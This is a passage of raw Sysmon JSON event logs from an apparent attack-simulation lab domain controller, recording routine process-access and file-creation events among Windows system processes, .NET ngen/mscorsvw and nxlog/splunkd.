{"EventTime":"2020-08-01 07:01:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7805,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:13.559\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1339-5F25-0000-001072960C00}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:13.559","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1339-5F25-0000-001072960C00}","TargetProcessId":"4576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7806,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:13.559\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1339-5F25-0000-001072960C00}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:13.559","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1339-5F25-0000-001072960C00}","TargetProcessId":"4576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7807,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:13.637\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:13.637","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7808,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:14.637\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:14.637","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7809,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:15.231\r\nProcessGuid: {E2A3D6B1-1339-5F25-0000-001072960C00}\r\nProcessId: 4576\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11e0-0\\Microsoft.VisualBasic.Compatibility.dll\r\nCreationUtcTime: 2020-08-01 07:01:15.231","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:15.231","ProcessGuid":"{E2A3D6B1-1339-5F25-0000-001072960C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11e0-0\\Microsoft.VisualBasic.Compatibility.dll","CreationUtcTime":"2020-08-01 07:01:15.231","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7810,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.278\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-132B-5F25-0000-00109E810B00}\r\nTargetProcessId: 752\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.278","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-132B-5F25-0000-00109E810B00}","TargetProcessId":"752","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7811,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.278\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-132B-5F25-0000-00109E810B00}\r\nTargetProcessId: 752\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.278","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-132B-5F25-0000-00109E810B00}","TargetProcessId":"752","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7812,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.294\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-00107E9B0C00}\r\nTargetProcessId: 752\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:15.294","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-00107E9B0C00}","TargetProcessId":"752","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7813,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:15.341\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-00105B9F0C00}\r\nTargetProcessId: 3144\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 